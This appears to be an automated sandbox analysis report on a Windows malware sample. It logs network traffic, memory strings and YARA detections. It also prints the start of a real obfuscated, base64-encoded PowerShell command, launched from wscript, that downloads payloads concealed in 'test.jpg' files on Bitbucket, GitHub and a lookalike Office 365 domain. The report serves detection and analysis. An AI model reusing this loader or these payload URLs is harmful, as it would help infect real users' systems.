                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: global trafficHTTP traffic detected: GET /ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /1/test.jpg HTTP/1.1Host: ofice365.github.ioConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /richie213/karanew/refs/heads/main/ieIgFed.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                Source: global trafficDNS traffic detected: DNS query: ofice365.github.io
                Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Feb 2025 18:03:26 GMTContent-Type: text/html; charset=utf-8Content-Length: 15184Server: AtlassianEdgeVary: authorization, cookie, user-context, Accept-Language, Origin, Accept-EncodingX-Used-Mesh: FalseContent-Language: enX-View-Name: bitbucket.apps.downloads.views.download_fileEtag: "005ea47b4a3697fb6cc8fe1e26350ff1"X-Dc-Location: Micros-3X-Served-By: e803c49e18dcX-Version: bd59e0614108X-Static-Version: bd59e0614108X-Request-Count: 2133X-Render-Time: 0.0694434642791748X-B3-Traceid: 8625f0670e484c97bf6c8df4c06d7604X-B3-Spanid: f91191a9b97bc9a9X-Frame-Options: SAMEORIGINContent-Security-Policy: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net app.pendo.io cdn.pendo.io data.pendo.io pendo-io-static.storage.googleapis.com pendo-static-6291417196199936.storage.googleapis.com https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ 'nonce-OCrzoy+ppDYxEMFGOn0Fuw=='; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org app.pendo.io; base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev--b
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.1746460784.000001C1E0AE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023096F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000004.00000002.1474264752.000002309735C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://admin.atlassian.com
                Source: powershell.exe, 00000002.00000002.1746460784.000001C1E0A9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1746460784.000001C1E0ABA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023096F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.bitbucket.org
                Source: RegAsm.exe, 00000007.00000002.2586589024.0000000003023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://archive.torproject.org/tor-package-archive/torbrowser/13.0.9/tor-expert-bundle-windows-i686-
                Source: powershell.exe, 00000004.00000002.1474264752.000002309735C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://atlassianblog.wpengine.com/wp-json/wp/v2/posts?tags=11972&context=embed&per_page=6&orderby=d
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097343000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097343000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097343000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097343000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097343000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097343000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097343000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/bd59e0614108/
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/bd59e0614108/css/entry/ad
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/bd59e0614108/css/entry/ap
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/bd59e0614108/css/entry/ve
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/bd59e0614108/css/themes/a
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/bd59e0614108/dist/webpack
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/bd59e0614108/img/default_
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/bd59e0614108/img/logos/bi
                Source: powershell.exe, 00000004.00000002.1474264752.000002309735C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/bd59e0614108/jsi18n/en/dj
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097343000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
                Source: powershell.exe, 00000002.00000002.1746460784.000001C1E0FF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1779920207.000001C1F9170000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1473869671.00000230955D4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1473826669.00000230955C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023096F61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1473220262.00000230952FA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1473220262.000002309537A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097182000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1473220262.00000230952F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1473220262.0000023095316000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113
                Source: powershell.exe, 00000004.00000002.1474264752.000002309735C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/gateway/api/emoji/
                Source: powershell.exe, 00000004.00000002.1474264752.000002309735C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.status.atlassian.com/
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bqlf8qjztdtr.statuspage.io
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097343000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097343000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: RegAsm.exe, 00000007.00000002.2586589024.0000000003023000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000003F91000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2618327273.00000000057E0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000004035000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                Source: RegAsm.exe, 00000007.00000002.2586589024.0000000003023000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000003F91000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2618327273.00000000057E0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000004035000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                Source: RegAsm.exe, 00000007.00000002.2586589024.0000000003023000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000003F91000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2618327273.00000000057E0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000004035000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/login
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/login?prompt=login&amp;continue=https%3A%2F%2Fbitbucket.org%2Fccccccccccccn
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/logout
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/manage-profile/
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/profile/rest/profile&quot;
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ofice365.github.io
                Source: powershell.exe, 00000002.00000002.1746460784.000001C1E0FF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1779920207.000001C1F9170000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1473869671.00000230955D4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1473826669.00000230955C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023096F61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1473220262.00000230952FA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1473220262.000002309537A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097182000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1473220262.00000230952F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1473220262.0000023095316000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ofice365.github.io/1/test.jpg
                Source: powershell.exe, 00000004.00000002.1474264752.000002309735C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://preferences.atlassian.com
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                Source: RegAsm.exe, 00000007.00000002.2586589024.0000000003023000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000003F91000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2618327273.00000000057E0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000004035000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                Source: RegAsm.exe, 00000007.00000002.2586589024.0000000003023000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000003F91000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2618327273.00000000057E0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000004035000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                Source: RegAsm.exe, 00000007.00000002.2600719194.0000000003F91000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2618327273.00000000057E0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000004035000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                Source: powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097343000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                Source: powershell.exe, 00000004.00000002.1474264752.000002309735C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.atlassian.com/try/cloud/signup?bundle=bitbucket
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.7:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.199.110.153:443 -> 192.168.2.7:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.7:49770 version: TLS 1.2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: Process Memory Space: powershell.exe PID: 7704, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7844, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}Jump to behavior
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Wscript starts Powershell (via cmd or directly)
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@C
